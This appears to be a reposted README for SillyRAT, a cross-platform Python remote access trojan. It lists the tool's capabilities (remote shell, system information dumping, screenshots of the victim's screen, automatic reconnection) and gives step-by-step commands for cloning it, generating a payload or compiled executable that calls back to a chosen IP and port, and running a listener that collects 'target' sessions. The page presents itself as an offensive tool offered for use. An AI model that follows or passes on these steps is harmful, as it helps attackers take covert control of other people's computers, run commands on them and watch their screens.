SillyRAT: Cross Platform multifunctional (Windows/Linux/Mac) RAT
SillyRAT
A cross-platform RAT is written in pure Python. The RAT accepts commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establishes connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate a payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.
Features
- Built-in Shell for command execution
- Dumping System Information including drives and rams
- Screenshot module. Captures screenshot of client screen.
- Connection Loop (Will continue on connecting to server)
- Currently, it uses BASE64 encoding.
- Pure Python
- Cross-Platform. (Tested on Linux. Errors are accepted)
- Source File included for testing
- Python 3
Installation
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Use
Generating Payload
You can get the payload file in two ways:
- Source File
- Compiled File
The source file is to remain the same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
The compiled version has to generate on the respective platform. For example, you can’t generate a .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer
Replace your IP Address and Port on the above commands.
Running Server
The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn’t store any session from the last run. So, all the progress will be lost once the server application gets terminated. Running your server:
$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
Connections
All the connections will be listed under the sessions command:
You can connect to your target session with connect command and launch one of the available commands:
Help
Get a list of available commands:
$ help
Help on a Specific Command:
$ help COMMAND
Copyright (c) 2020 Shiri
Source: https://github.com/hash3liZer/